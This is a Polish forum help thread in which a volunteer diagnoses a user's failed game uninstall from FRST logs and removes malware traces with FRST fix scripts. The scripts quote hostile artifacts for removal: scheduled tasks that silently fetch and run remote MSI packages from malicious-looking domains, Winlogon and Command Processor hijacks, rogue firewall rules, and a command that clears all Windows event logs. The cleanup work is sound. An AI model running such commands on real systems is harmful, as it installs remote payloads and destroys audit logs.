xxbartus utworzono 5 grudnia 2021 utworzono 5 grudnia 2021 Na wstępnie - jeśli zły dział to przepraszam i zmieńcie go na poprawny. Jest to mój pierwszy takowy post, więc również nie wiem co jest potrzebne do diagnozy. Piszcie co potrzebne do doślę Procek: Intel(R) Core(TM) i7-6700 CPU @ 3.40GHz 3.41 GHz Karta Graficzna: NVIDIA GeForce GTX 1060 3GB RAM: 8 GB Win 10, 64bity Cześć wszystkim. Posiadam taki problem, otóż chciałem ostatnio pograć w Stronghold Crusader Extreme i w instalacji pojawiło się, że mogę grać. Zdziwiłem się bo nie instalowałem jej w ostatnim dłuższym czasie. Ale spróbowałem.. Nacisnąłem graj.. i ukazało się, że nie może znaleźć pliku z grą. To stwierdziłem, że spróbuję ją przeinstalować. Wchodząc w panel sterowania>odinstaluj programy> Stronghold Crusader Extreme pojawił mi się taki o to problem: Unhandled Exception Error Number: 0x80040702 Description: Failed to load DLL: GameUXInstallHelper_FF Setup will now terminate. Następnie próbowałem naprawić to dołączeniem GameUXInstallHelper_FF do SysWOW64 jak i do odpowiednika 32. Nic nie dało. Próbowałem w konsoli resetować ten plik. Sprawdzałem wszystko co napotykałem na polskich i zagranicznych forach jednak bezskutecznie. Chciałem usunąć samą pozostałość z rejestru po grze, która widnieje jako zainstalowana w 2018r. Jednak wyskakiwało, że nie można usunąć {8C3727F2-8E37-49E4-820C-03B1677F53B6}. Po wielu próbach trafiłem na jakiś post zagraniczny, że ktoś wykorzystał CCleanera do tego. Mianowicie wykonał cały przegląd Registry, rozwiązania problemów napotkanych a później z poziomu CCleaner>Tools>Uninstall usunął tę grę i wszystko było po sprawie. Tak też wykonałem to i obecnie gra zniknęła mi z panelu sterowania>odinstaluj programy, rejestru, CCleanera, UninstallView. Problem również został bo dalej nie da się jej odinstalować. Brakuje mi pomysłów. Liczę na Was i Waszą pomoc! W razie jakiś braków piszcie! Pozdro
Twój_Anioł_Stróż komentarz 6 grudnia 2021 komentarz 6 grudnia 2021 Zrób logi z FRST > http://www.forumpc.pl/topic/277786-nieingerencyjne-narzędzia-do-tworzenia-logów-systemowych/?p=2010191 przed skanem zaznacz: Additional.txt Shortcut.txt, 1
xxbartus komentarz 6 grudnia 2021 Autor komentarz 6 grudnia 2021 Cześć Mój Stróżu Dziękuję za tak sprawną odpowiedź Poniżej załączam pliki o które prosiłeś. Czekam na kolejne kroki Addition.txt FRST.txt Shortcut.txt
Twój_Anioł_Stróż komentarz 6 grudnia 2021 komentarz 6 grudnia 2021 (edytowane) Cytuj odinstaluj programy> Stronghold Crusader Extreme Czy to ten sam program: Cytuj Stronghold (HKLM-x32\...\{C917BA70-28A3-4C74-B163-41FD8C8E1A5A}) (Version: 1.20.0000 - Firefly Studios) (nigdy nie korzystałem z takich gier, więc pytam) ------------- Masz co najmniej kilka infekcji, więc: Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego: C:\Program Files (x86)\eQvvyMYx.exe C:\WINDOWS\aEYOl.exe C:\Program Files (x86)\iHEvcaGXYWUg.exe C:\WINDOWS\SysWOW64\iOEAI.exe HKU\S-1-5-21-2103383577-742474153-3939938881-1001\...\Winlogon: [Shell] %comspec% <==== UWAGA HKU\S-1-5-21-2103383577-742474153-3939938881-1001\...\Command Processor: @mode 20,5 & tasklist /FI "IMAGENAME eq SoundMixer.exe" 2>NUL | find /I /N "SoundMixer.exe">NUL && exit & if exist ( start /MIN "" & tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) else ( tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) <==== UWAGA Task: {71150430-F4EB-4F31-97FA-7400F8262B24} - System32\Tasks\{56959BF3-2978-45E7-8999-0D0C9BCA28B6} => "msiexec.exe" -ihttp://inthemel.info/kkofeqdsswfw.fbf -q -ihxxp://inthemel.info/kkofeqdsswfw.fbf -q (Brak pliku) <==== UWAGA Task: {B0CE30B5-4C54-4165-8CF8-A155AB05C282} - System32\Tasks\{F1E0824A-DA43-D034-F25F-9D44EA59B507} => "msiexec.exe" -ihttp://inthemel.info/ttugw4y98ezl.uyv -q -ihxxp://inthemel.info/ttugw4y98ezl.uyv -q (Brak pliku) <==== UWAGA Task: {B4CC682E-D160-45B6-ADA3-64926E2F6421} - System32\Tasks\{6D26B412-94A4-642E-00BD-D00174A74192} => "msiexec.exe" -ihttps://numbersionocego.info/nyimvvolnyvr.btb -q -ihxxps://numbersionocego.info/nyimvvolnyvr.btb -q (Brak pliku) <==== UWAGA C:\Users\Admin\AppData\Roaming\Fazala.exe C:\Users\Admin\AppData\Local\imw.ini C:\Users\Admin\AppData\Local\VlzYU.exe HKU\S-1-5-21-2103383577-742474153-3939938881-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.nav-pl.com/ SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.globasearch.com/?serie=225&installkey=sZxTafLayCut8hKkFtcK&b=3&q={searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.globasearch.com/?serie=225&installkey=sZxTafLayCut8hKkFtcK&b=3&q={searchTerms} SearchScopes: HKU\S-1-5-21-2103383577-742474153-3939938881-1001 -> DefaultScope {087B6495-B8CF-4677-907C-4ED6A2664202} URL = hxxp://www.nav-pl.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-2103383577-742474153-3939938881-1001 -> {087B6495-B8CF-4677-907C-4ED6A2664202} URL = hxxp://www.nav-pl.com/search?q={searchTerms} SearchScopes: HKU\S-1-5-21-2103383577-742474153-3939938881-1001 -> {95B7759C-8C7F-4BF1-B163-73684A933233} URL = hxxps://mysearch.avg.com/search?cid={43F73963-F8FD-47C0-8421-7904DAEAF81B}&mid=08695619971447cf880b9d852ca31703-0a63f5c5a8de04831c95de8baea861ccd05a28ed&lang=pl&ds=AVG&coid=avgtbavg&cmpid=0217tb&pr=fr&d=2016-11-02 15:08:41&v=4.3.9.626&pid=wtu&sg=&sap=dsp&q={searchTerms} BHO: Brak nazwy -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> Brak pliku HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk" FirewallRules: [{681186E8-95B2-4E56-B6F4-F513AC2EED44}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{9C92CFB9-94B6-4116-914A-0D5041511178}] => (Allow) C:\WINDOWS\SysWOW64\iOEAI.exe (Microsoft Corporation) [Brak podpisu cyfrowego] FirewallRules: [{82786022-B638-47DF-8E46-51C523547544}] => (Allow) C:\Program Files (x86)\iHEvcaGXYWUg.exe (Microsoft Corporation) [Brak podpisu cyfrowego] FirewallRules: [{0134C004-A700-4108-9512-207816E3A0CF}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{571AFC1A-F15B-45B5-9B78-056C9BF8CE2F}] => (Allow) C:\WINDOWS\SysWOW64\svchost.exe (Microsoft Windows Publisher -> Microsoft Corporation) FirewallRules: [{ACA9D774-75C5-409E-8D6B-C9D1E818ABE3}] => (Allow) C:\WINDOWS\aEYOl.exe (Microsoft Corporation) [Brak podpisu cyfrowego] FirewallRules: [{D08DC155-2CEB-4992-90B7-CCAF2C1D23D9}] => (Allow) C:\Program Files (x86)\eQvvyMYx.exe (Microsoft Corporation) [Brak podpisu cyfrowego] FirewallRules: [{A9E85927-70C9-4A18-85B8-A715E93035EE}] => (Allow) C:\WINDOWS\SysWOW64\msiexec.exe (Microsoft Windows -> Microsoft Corporation) HKLM-x32\...\Run: [] => [X] HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== UWAGA GroupPolicy: Ograniczenia ? <==== UWAGA Policies: C:\ProgramData\NTUSER.pol: Ograniczenia <==== UWAGA HKLM\SOFTWARE\Policies\Mozilla\Firefox: Ograniczenia <==== UWAGA HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA Task: {18515B39-5491-44F2-9C27-CE2B12BEF8D7} - System32\Tasks\Antivirus Emergency Update => C:\Program Files (x86)\AVG\Antivirus\AvEmUpdate.exe (Brak pliku) Task: {232E6A1B-06D3-4828-B6BD-F994C5C85A5E} - System32\Tasks\{7FDE55F9-7314-2DA8-DAC7-96C085FE5385} => "msiexec.exe" -ihttps://numbersionocego.info/623bf9xs8att.vfv -q -ihxxps://numbersionocego.info/623bf9xs8att.vfv -q (Brak pliku) <==== UWAGA Task: {317EBDA3-D0F8-4F0D-AC99-A305F84AA60E} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe /backup /iavs (Brak pliku) Task: {32BB8223-AE8B-4010-91AE-C722A3BEE2E7} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA Task: {B594BCF0-5C01-4B17-AAD3-9A93090C8FD2} - System32\Tasks\AVGUpdateTaskMachineCore => C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe /c (Brak pliku) Task: {C5353E2C-806E-46BA-94D8-FFD9CE6C94CA} - System32\Tasks\Chess Titans => C:\Users\Admin\AppData\Local\Temp\is-283JE.tmp\prsetup.exe "/logon" (Brak pliku) <==== UWAGA Edge HomePage: Default -> hxxp://www.nav-pl.com/ Edge StartupUrls: Default -> "hxxp://www.nav-pl.com/" Edge DefaultSearchURL: Default -> hxxp://www.nav-pl.com/search?q={searchTerms} Edge DefaultSearchKeyword: Default -> nav-pl.com CHR Session Restore: Profile 1 -> [funkcja włączona] S3 dg_ssudbus; \SystemRoot\system32\DRIVERS\ssudbus2.sys [X] S3 huawei_enumerator; \SystemRoot\System32\drivers\ew_jubusenum.sys [X] S1 SaferVPNNetfilter2; system32\drivers\SaferVPNNetfilter2.sys [X] C:\Users\Admin\AppData\Local\Tempzxpsigne052820d6935a1ef C:\Users\Admin\AppData\Local\Tempzxpsign9b8815f17630e9d8 C:\Users\Admin\AppData\Local\Tempzxpsigna1a50f37a182c538 Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). --------------- Uruchom FRST. W polu SEARCH (SZUKAJ) wklej: Cytuj GameUXInstallHelper_FF; {8C3727F2-8E37-49E4-820C-03B1677F53B6}; kliknij na przycisk "Search Registry" (Szukaj w Rejestrze). Raport z tego będzie tam, gdzie jest FRST. 1
xxbartus komentarz 6 grudnia 2021 Autor komentarz 6 grudnia 2021 Cytuj Godzinę temu, Twój_Anioł_Stróż napisał: Cytuj odinstaluj programy> Stronghold Crusader Extreme Czy to ten sam program: Cytuj Stronghold (HKLM-x32\...\{C917BA70-28A3-4C74-B163-41FD8C8E1A5A}) (Version: 1.20.0000 - Firefly Studios) (nigdy nie korzystałem z takich gier, więc pytam) To są dwie różne gry. Jest Stronghold (zainstalowana i wszystko ok) i jest ta gra/y o która chodzi czyli Stronghold Crusader i/lub Stronghold Crusader Extreme. Niestety nie ukrywam, że komputer to dziko używałem i pobierałem nieraz jak leci dlatego zapewne są infekcje. Wykonałem to jak kazałeś - na pierwszy rzut oka naprawiłeś włączanie kompa bo miałem czarny ekran zawsze i musiałem wchodzić crtl+alt+del>menedzer zadan>uruchom nowe zadanie>explorer.exe a teraz juz nie więc no Poniżej standardowo załączam plik z Searcha. Raport.txt
Twój_Anioł_Stróż komentarz 6 grudnia 2021 komentarz 6 grudnia 2021 (edytowane) Wyszukiwanie nic nie znalazło w Rejestrze. Nie wiem więc, czego jeszcze mam szukać? Uruchom FRST. W polu SEARCH (SZUKAJ) wklej: Cytuj Crusader kliknij na przycisk "Search Registry" (Szukaj w Rejestrze). Raport z tego będzie tam, gdzie jest FRST. 1
xxbartus komentarz 6 grudnia 2021 Autor komentarz 6 grudnia 2021 Przy próbie odpalenia jest taki komunikat + dalej pokazuje jako zainstalowaną grę... :? Raport z Crusader'a Rap_crus.txt
Twój_Anioł_Stróż komentarz 6 grudnia 2021 komentarz 6 grudnia 2021 (edytowane) Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y.Otworzy się Notatnik - wklej do niego: StartRegedit: Windows Registry Editor Version 5.00 [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\Games\{40A855C5-403C-42A8-BEF5-65AC9CE86C83}] [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameUX\Games\{583874E7-77F8-44F8-B019-C76A06B8E55F}] [-HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Firefly Studios\Stronghold Crusader Extreme] [-HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\DirectPlay\Applications\Stronghold Crusader] [-HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\DirectPlay\Applications\Stronghold Crusader Extreme] [-HKEY_USERS\S-1-5-21-2103383577-742474153-3939938881-1001\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\21972c0e_0] [-HKEY_USERS\S-1-5-21-2103383577-742474153-3939938881-1001\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\a5d65e06_0] [-HKEY_USERS\S-1-5-21-2103383577-742474153-3939938881-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{A247772F-1BD8-489C-B8F6-9AB2F81EF55D}] [-HKEY_USERS\S-1-5-21-2103383577-742474153-3939938881-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{F4863CF7-F8D5-41F2-891D-CE6395F0619F}] [-HKEY_USERS\S-1-5-21-2103383577-742474153-3939938881-1001\System\GameConfigStore\Children\5096f489-68c6-4b46-9cad-9ab86017a00c] EndRegedit: Reboot: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). . Napisz, czy to coś pomogło? . 1
xxbartus komentarz 6 grudnia 2021 Autor komentarz 6 grudnia 2021 Nie wiem jak mam Ci dziękować ale naprawiłeś to! Sam się głowiłem szukałem sposobów, które nie pomagały. A jednak nie jestem na tyle obeznany systemie aby potrafić tak się posługiwać nim. Dziękuję za wszelką pomoc! Czy ja w podziękowaniu mogę jakoś tutaj dać Ci jakąś odznakę, plus.. cokolwiek?
Ten post jest popularny. Twój_Anioł_Stróż komentarz 6 grudnia 2021 Ten post jest popularny. komentarz 6 grudnia 2021 (edytowane) Cytuj jakoś tutaj dać Ci jakąś odznakę, plus.. cokolwiek? chyba jest coś takiego. w moich postach na dole po prawej są pewne znaczki - wystarczy wybrać jeden z nich (najlepiej "dobra wypowiedź"). Przynajmniej tak mi zdaje. 3
Wciąż szukasz rozwiązania problemu? Napisz teraz na forum!
Możesz zadać pytanie bez konieczności rejestracji - wystarczy, że wypełnisz formularz.